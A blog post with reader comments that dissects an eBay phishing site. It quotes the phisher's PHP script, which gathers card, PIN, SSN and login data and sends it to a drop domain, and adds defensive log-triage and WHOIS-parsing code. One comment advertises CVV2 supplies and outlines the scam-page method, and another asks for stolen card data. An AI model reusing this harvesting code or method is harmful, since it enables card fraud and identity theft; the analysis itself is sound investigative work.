Looks like EBay, but smells like Phish
About once a week I get one of those stupid eBay account verification email messages that send me to non-eBay sites and ask me for information that can be used to steal my identity, or at least my money. This morning another one arrived, but this time I think the phisher made a mistake …
This is the email that I found in my inbox this morning:

Looks like EBay, but smells like Phish!
As you guessed correctly, the purple link in this email does not take you to an eBay web site; it sends you straight to the phisher, who asks for everything you are willing to hand over: credit card information, eBay user ID and password, Social Security number, and so on. The web form that asks all those questions is hosted at “http://ebay-customer-validate.info/”.
This is the first part of the web form you’re supposed to fill in:

According to WHOIS, this is a pretty new domain (one month old) that was registered with a lot of phony information:
Update 03/10/2005: The personal information about the registrant has been removed per request
Domain ID:D5916187-LRMS
Domain Name:EBAY-CUSTOMER-VALIDATE.INFO
Created On:10-May-2004 02:20:06 UTC
Last Updated On:10-Jun-2004 04:08:01 UTC
Expiration Date:10-May-2005 02:20:06 UTC
Sponsoring Registrar:R191-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C4692873-LRMS
Registrant Name:MIKE LYNN
Registrant Organization:MIKE LYNN
Registrant Street1:—- ———
Registrant City:—–
Registrant State/Province:—–
Registrant Postal Code:—–
Registrant Country:US
Registrant Phone:—————
Registrant FAX:—————
Registrant Email:226cb677843604edbf781c459ac930d4-844435@owner.gandi.net
Admin ID:C4692872-LRMS
Admin Name:MIKE LYNN
Admin Street1:—- ——–
Admin City:—–
Admin State/Province:—–
Admin Postal Code:——
Admin Country:US
Admin Phone:————–
Admin Email:6754fd5d747bbc58b2da0022f2b7b3fb-ml1287@contact.gandi.net
Billing ID:C1249598-LRMS
Billing Name:CONTACT NOT AUTHORITATIVE see http://www.gandi.net/whois
Billing Organization:GANDI sarl
Billing Street1:see also whois.gandi.net
Billing City:Paris
Billing Postal Code:F-75003
Billing Country:FR
Billing Email:support@gandi.net
Tech ID:C4692872-LRMS
Tech Name:MIKE LYNN
Tech Street1:—- ———
Tech City:—–
Tech State/Province:—–
Tech Postal Code:——
Tech Country:US
Tech Phone:————-
Tech Email:6754fd5d747bbc58b2da0022f2b7b3fb-ml1287@contact.gandi.net
Name Server:NS4.WORLDISPNETWORK.COM
Name Server:NS3.WORLDISPNETWORK.COM
Looking at the current IP address of “ebay-customer-validate.info” (66.160.143.112), I can tell that it is some random host inside Hurricane Electric’s address space:
Hurricane Electric HURRICANE-7 (NET-66-160-128-0-1)
66.160.128.0 - 66.160.207.255
Host Department, LLC. HURRICANE-CE1412-438 (NET-66-160-143-0-1)
66.160.143.0 - 66.160.143.255
# ARIN WHOIS database, last updated 2004-06-09 19:10
# Enter ? for additional hints on searching ARIN’s WHOIS database.
Looking at the HTML code of the phishing page, I can see that once you have filled in the form, the data is processed by a PHP script called set.php. Just hitting the “Submit” button without filling in any information brings up a JavaScript alert telling you to fill in the blank fields.
The HTML code also shows that the form data is POSTed to the PHP script (rather than sent with the GET method). So I decided to request set.php via GET instead of POST. Instead of executing the script, the server returned its source code. It looks like whoever set up the phishing site wired only the POST method to PHP execution, so a plain GET hands you the raw script.
The script is pretty straightforward; here are the most interesting PHP lines:
$ok = 1;
// Names of the form fields the page collects (register_globals makes each one a global variable)
$av = array("user", "pass", "email", "ccnumber", "month", "day", "year", "cvv", "ccholder", "address", "address2",
            "dayphone1", "dayphone2", "dayphone3", "dayphone4", "cityaddr", "stateprovaddr", "zipcodeaddr", "countryaddr",
            "firstname", "middlename", "lastname", "bankcountry", "bankname", "bankroutingnumber", "bankaccountnumber",
            "bankaccountnumber2", "ssn1", "ssn2", "ssn3", "pin", "mmn", "birthdatemm", "birthdatedd", "birthdateyy",
            "dlnumber", "dlstate", "set");
for ($j = 0; $j < count($av); $j++) {
    $temp = $av[$j];
    del($$temp);   // del() is defined elsewhere in the script (not shown here)
}
// Only sanity checks: a loose email regex and minimum lengths for PIN and card number
if (!eregi("^[a-z0-9\._-]+@[a-z0-9\._-]+\.[a-z]{2,4}\$", $email)) $email = "";
if (strlen($pin) < 4) $ok = 0;
if (strlen($ccnumber) < 4) $ok = 0;
if ($email == "" OR $pass == "" OR $user == "" OR $month == "" OR $day == "" OR $year == "" OR $pin == "" OR $ccnumber == "") $ok = 0;
if ($set == 1 AND $ok == 1)
{
    $text = "cc# : $ccnumber $month $year PIN: $pin
Ebay User ID: $user
Password: $pass
Email Address: $email
Expiration date: $month / $day / $year
CVV Code: $cvv
Your name on card: $ccholder
Billing address: $address
- $address2
Primary telephone: ($dayphone1) $dayphone2
Secondary telephone: ($dayphone3) $dayphone4
City: $cityaddr
State/province: $stateprovaddr
Zip/postal code: $zipcodeaddr
Country: $countryaddr
Social Security Number: $ssn1 $ssn2 $ssn3
Card PIN Number: $pin
Mother's Maiden Name: $mmn
Date Of Birth: $birthdatemm $birthdatedd $birthdateyy=============================
";
    // Forward the whole record to the drop site as one URL-encoded GET parameter
    $fp = @fopen("http://informationlevelone.biz/got.php?ipz=" . urlencode($text), 'rb');
    fflush($fp);
    fclose($fp);
}
This code checks that you really filled in the form, and only if $ok is still 1 after the checks (and a form variable called set is also 1) does it run the part of the script that forwards all the information to another web site.
In this case the other web site is “http://informationlevelone.biz/”, where it hands the data to another PHP script called “got.php”. Because it uses fopen() on a URL, the whole record travels in the query string of a GET request, which means a copy of it lands in the drop host’s web server log (and in any proxy log on the path).
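What that GET-based hand-off means for a responder who obtains the drop host's access log is easy to show in code. The Python below is an added example, not code from the post or from the phisher: it builds a constructed Apache-style log line carrying a made-up record in exactly the layout $text has above, recovers the record from the ipz parameter, masks the card number and runs a Luhn check on it (the phisher's own script only checks for a length of at least four). The field labels follow the $text format on this page; the IP addresses, timestamp, user agent and personal data are invented.

```python
import re
from urllib.parse import urlsplit, parse_qs, quote_plus

# Constructed victim record in the layout set.php builds in $text (all values made up).
SAMPLE_TEXT = (
    "cc# : 4111111111111111 12 2006 PIN: 1234\n"
    "Ebay User ID: victim42\n"
    "Password: hunter2\n"
    "Email Address: victim42@example.com\n"
    "Expiration date: 12 / 31 / 2006\n"
    "CVV Code: 999\n"
    "Your name on card: J VICTIM\n"
    "Social Security Number: 123 45 6789\n"
    "Card PIN Number: 1234\n"
    "Mother's Maiden Name: Smith\n"
    "Date Of Birth: 01 02 1970=============================\n"
)

# Constructed access log (Apache combined format) as the drop host would see it.
# PHP's urlencode() encodes spaces as '+', which quote_plus() reproduces.
# The request comes from the phishing host, not from the victim.
SAMPLE_LOG = (
    '66.160.143.112 - - [10/Jun/2004:04:12:33 +0000] "GET /got.php?ipz=%s HTTP/1.0" 200 0 "-" "PHP/4.3.4"\n'
    % quote_plus(SAMPLE_TEXT)
    + '10.0.0.5 - - [10/Jun/2004:04:13:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/4.0"\n'
)

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_payload(text):
    """Split the decoded $text block into {label: value}; strips the '=====' trailer."""
    fields = {}
    for raw in text.rstrip("=\n").splitlines():
        label, sep, value = raw.partition(":")
        if sep:
            fields[label.strip()] = value.strip().rstrip("=")
    return fields


def extract_records(log_text):
    """Yield (phish_host_ip, timestamp, fields) for every got.php hit carrying an ipz payload."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/got.php"):
            continue
        payload = parse_qs(url.query).get("ipz")   # parse_qs undoes urlencode()
        if not payload:
            continue
        yield m.group("src"), m.group("ts"), parse_payload(payload[0])


def luhn_ok(number):
    """Luhn checksum: weeds out records whose 'card number' is not even a plausible PAN."""
    digits = [int(c) for c in number if c.isdigit()]
    if len(digits) < 13:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(number):
    """Keep only the last four digits so the triage output itself is not a card dump."""
    digits = "".join(c for c in number if c.isdigit())
    return "*" * max(len(digits) - 4, 0) + digits[-4:]


def triage(log_text):
    """One masked summary row per recovered record."""
    rows = []
    for src, ts, fields in extract_records(log_text):
        cc_line = fields.get("cc#", "")
        pan = cc_line.split()[0] if cc_line else ""
        rows.append({
            "phish_host_ip": src,
            "time": ts,
            "user": fields.get("Ebay User ID"),
            "pan_masked": mask_pan(pan),
            "pan_luhn_ok": luhn_ok(pan),
            "has_ssn": bool(fields.get("Social Security Number", "").strip()),
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(row)
```

The same parser works on proxy logs from the phishing host's side, since the request line is identical there; only the source address changes.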
Well, so who is “informationlevelone.biz” - let’s take a look at the WHOIS record:
Domain Name: INFORMATIONLEVELONE.BIZ
Domain ID: D7117735-BIZ
Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Domain Status: ok
Registrant ID: OLNIC_706285_0_0
Registrant Name: Vahtang Ahmadulin
Registrant Organization: Vahtang Ahmadulin
Registrant Address1: 3524 west shore rd.
Registrant City: Warwick
Registrant State/Province: na
Registrant Postal Code: 3524
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.2054060100
Registrant Facsimile Number: +1.2054060100
Registrant Email: noc@sweb.ru
Administrative Contact ID: OLNIC_706285_1_0
Administrative Contact Name: Vahtang Ahmadulin
Administrative Contact Organization: Vahtang Ahmadulin
Administrative Contact Address1: 3524 west shore rd.
Administrative Contact City: Warwick
Administrative Contact State/Province: na
Administrative Contact Postal Code: 3524
Administrative Contact Country: United States
Administrative Contact Country Code: US
Administrative Contact Phone Number: +1.2054060100
Administrative Contact Facsimile Number: +1.2054060100
Administrative Contact Email: noc@sweb.ru
Billing Contact ID: OLNIC_706285_3_0
Billing Contact Name: Vahtang Ahmadulin
Billing Contact Organization: Vahtang Ahmadulin
Billing Contact Address1: 3524 west shore rd.
Billing Contact City: Warwick
Billing Contact State/Province: na
Billing Contact Postal Code: 3524
Billing Contact Country: United States
Billing Contact Country Code: US
Billing Contact Phone Number: +1.2054060100
Billing Contact Facsimile Number: +1.2054060100
Billing Contact Email: noc@sweb.ru
Technical Contact ID: OLNIC_706285_2_0
Technical Contact Name: Vahtang Ahmadulin
Technical Contact Organization: Vahtang Ahmadulin
Technical Contact Address1: 3524 west shore rd.
Technical Contact City: Warwick
Technical Contact State/Province: na
Technical Contact Postal Code: 3524
Technical Contact Country: United States
Technical Contact Country Code: US
Technical Contact Phone Number: +1.2054060100
Technical Contact Facsimile Number: +1.2054060100
Technical Contact Email: noc@sweb.ru
Name Server: NS2.SPACEWEB.RU
Name Server: NS1.SPACEWEB.RU
Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Domain Registration Date: Tue Jun 08 13:45:57 GMT 2004
Domain Expiration Date: Tue Jun 07 23:59:59 GMT 2005
The registrar is “China-Channel.com”, which to me almost certainly means that all the information in the registration record is fake. Name servers in Russia? That does not look good.
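The things this post reads off the two WHOIS records by eye (domain age, name servers, contact addresses) can be pulled out mechanically. The Python below is an added example, not code from the post: it parses the two record styles quoted above (the Afilias/LRMS “Key:Value” form for the .info domain and the OnlineNIC “Key: Value” form for the .biz domain) from trimmed copies embedded inline, and computes each domain’s age as of 10 June 2004, a date I assume for the post from the ARIN footer above.

```python
from datetime import datetime, timezone

# Assumed "now" for the age calculation (the ARIN footer on this page says 2004-06-09).
AS_OF = datetime(2004, 6, 10, 12, 0, tzinfo=timezone.utc)

# Constructed sample 1: trimmed from the .INFO record above (Afilias/LRMS "Key:Value" style).
INFO_RECORD = """\
Domain Name:EBAY-CUSTOMER-VALIDATE.INFO
Created On:10-May-2004 02:20:06 UTC
Last Updated On:10-Jun-2004 04:08:01 UTC
Expiration Date:10-May-2005 02:20:06 UTC
Sponsoring Registrar:R191-LRMS
Registrant Name:MIKE LYNN
Registrant Country:US
Registrant Email:226cb677843604edbf781c459ac930d4-844435@owner.gandi.net
Name Server:NS4.WORLDISPNETWORK.COM
Name Server:NS3.WORLDISPNETWORK.COM
"""

# Constructed sample 2: trimmed from the .BIZ record above (OnlineNIC "Key: Value" style).
BIZ_RECORD = """\
Domain Name: INFORMATIONLEVELONE.BIZ
Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Registrant Name: Vahtang Ahmadulin
Registrant Country Code: US
Registrant Email: noc@sweb.ru
Name Server: NS2.SPACEWEB.RU
Name Server: NS1.SPACEWEB.RU
Domain Registration Date: Tue Jun 08 13:45:57 GMT 2004
Domain Expiration Date: Tue Jun 07 23:59:59 GMT 2005
"""

# Date layouts seen in the two records (others can be appended as encountered).
DATE_FORMATS = (
    "%d-%b-%Y %H:%M:%S UTC",     # 10-May-2004 02:20:06 UTC
    "%a %b %d %H:%M:%S GMT %Y",  # Tue Jun 08 13:45:57 GMT 2004
)
CREATED_KEYS = ("created on", "domain registration date", "creation date")


def parse_whois(text):
    """Return {lower_key: [values...]}; repeated keys such as Name Server accumulate."""
    record = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(("%", "#")):
            continue  # skip blank lines and RIPE/ARIN comment lines
        key, sep, value = line.partition(":")
        if not sep:
            continue
        record.setdefault(key.strip().lower(), []).append(value.strip())
    return record


def parse_date(value):
    for fmt in DATE_FORMATS:
        try:
            return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    raise ValueError("unrecognised WHOIS date: %r" % value)


def creation_date(record):
    for key in CREATED_KEYS:
        if key in record:
            return parse_date(record[key][0])
    raise KeyError("no creation date field in record")


def domain_age_days(record, as_of=AS_OF):
    return (as_of - creation_date(record)).days


def summarize(text, as_of=AS_OF):
    """The facts a phishing triage wants from a WHOIS record, in one dict."""
    record = parse_whois(text)
    nameservers = [ns.lower() for ns in record.get("name server", [])]
    emails = sorted({v.lower() for k, vs in record.items() if k.endswith("email") for v in vs})
    return {
        "domain": record["domain name"][0].lower(),
        "registrar": record.get("sponsoring registrar", ["?"])[0],
        "age_days": domain_age_days(record, as_of),
        "nameservers": nameservers,
        "nameserver_tlds": sorted({ns.rsplit(".", 1)[-1] for ns in nameservers}),
        "contact_emails": emails,
    }


if __name__ == "__main__":
    for rec in (INFO_RECORD, BIZ_RECORD):
        print(summarize(rec))
```

A domain registered a month before the lure arrived, and a drop domain registered two days before, are the kind of signals worth checking first; the script returns them as numbers rather than as an impression.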
When you open “http://informationlevelone.biz/” in a web browser, you are immediately redirected to “http://www.sweb.ru/”, a web hosting provider in St. Petersburg. The WHOIS lookup on the IP address of informationlevelone.biz (81.222.134.16) confirms this:
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 81.0.0.0 - 81.255.255.255
CIDR: 81.0.0.0/8
NetName: 81-RIPE
NetHandle: NET-81-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate:
Updated: 2004-03-16
# ARIN WHOIS database, last updated 2004-06-09 19:10
# Enter ? for additional hints on searching ARIN’s WHOIS database.
% This is the RIPE Whois server.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum: 81.222.134.0 - 81.222.135.255
netname: SpaceWeb
descr: PROVIDER
country: RU
admin-c: KAPY-RIPE
tech-c: KAPY-RIPE
status: ASSIGNED PA
notify: abuse@sweb.ru
mnt-by: ELTEL-RIPE-MNT
changed: registry@eltel.net 20040317
source: RIPE

route: 81.222.128.0/20
descr: ELTEL.net
origin: AS20597
mnt-by: ELTEL-RIPE-MNT
changed: registry@eltel.net 20021204
source: RIPE

person: Nikita V Kapitansky
address: 53A, 2-nd Line,
address: Vasilievsky Island
address: St-Petersburg, 199004, Russia
e-mail: manager@sweb.ru
phone: +7 812 3271923
fax-no: +7 812 3271923
notify: manager@sweb.ru
nic-hdl: KAPY-RIPE
changed: manager@sweb.ru 20020910
source: RIPE
I am certain that if we could get sweb.ru to reveal the identity of the customer running informationlevelone.biz on their servers, we would be a lot closer to one of the most notorious phishers out there. Whether this is the same person as “yernadop” (a name that appears yet again in the phishing form) remains to be seen.
Interestingly enough, while I was writing up this posting, the phisher corrected his or her mistake: the set.php source shown above can no longer be retrieved. But I guess the change came too late!
And even more interesting: here I sit on concrete information about a phisher, with details on where the thumbscrews would have to be applied, and I have no way of telling eBay about it. All they offer is an address to forward spoofed email to (spoof@ebay.com), but where do I send this kind of information? It raises the question whether they are really interested in stopping phishers from ripping off their users.
Gawd, your sleuthing is so interesting. I just got a bum email “from” Citibank, stating that my “wire transfer” was completed and that if I had any questions I should log into their website via the provided link, which asked for account information. Of course I realized it was a phony email fishing for information and that the link sent me to an insecure site. I sent the info (i.e. the link) to Citibank and within one day the link was rendered invalid. I don’t know what happened behind the scenes, but it is easy to see how an unknowing individual can be fooled!
I’m a writer for a biz mag. Looking to get examples of how easy it is to phish for a story…
Any ideas?
I got almost the same ebay verification mail redirecting to http://www.ebay-customer-validate.info/index.html
Why ebay did not do anything with this??? It is already September 2004. It looks like it worked for 3 months, right?
Quote: “Why ebay did not do anything with this??? ”
You want to get Ebay’s attention?
That’s easy - do what I just did, send SpamCop reports in response to every e-bay phish.
E-bay will then be contacted because their websites / e-mail addresses are referenced in the spam (and make no mistake about it, this IS spam!)
Please take down my personal information.
#1 - I didn’t buy that domain - someone used my information to buy it. But I did get a bunch of hate phone calls to my home. I figured out what happened when I got the email myself and looked it up.
#2 - why would a spammer buy a domain with valid info to do illegal things?
#3- I tried to contact ebay about it - they never responded.
#4 I also reported the identity theft to the FTC - nothing….
Did you ever get hold of RIPE NETWORKS? Because at the moment my Counter-Strike: Source dedicated server is getting knocked offline from 2 (195.156.109.234 & 81.48.195.17) of the IP addresses allocated to RIPE networks and I would like to know how to go about resolving this issue. My ISP SAYS THEY CAN’T DO ANYTHING ABOUT IT!
I am a l33t h4x0r, although I have cvv2 suppliers.
It’s kid stuff to get cvv2s: make a simple scam page that you trade, get a PHP host, upload, and spam mail lists that you trade as well.
If you wanna become a l33t h4x0r though, you’ve got to mail me, since I can do EVERYTHING.
This is my mail:
datacore@mail.bg
Hello,
I need information on: billing address; phone number; e-mail address; credit card number, expiry date, CVV/CVC number and PIN; Social Security number; mother’s maiden name; date of birth.
Please, I need a credit card to pay for some sites.
Thanks.
bharyor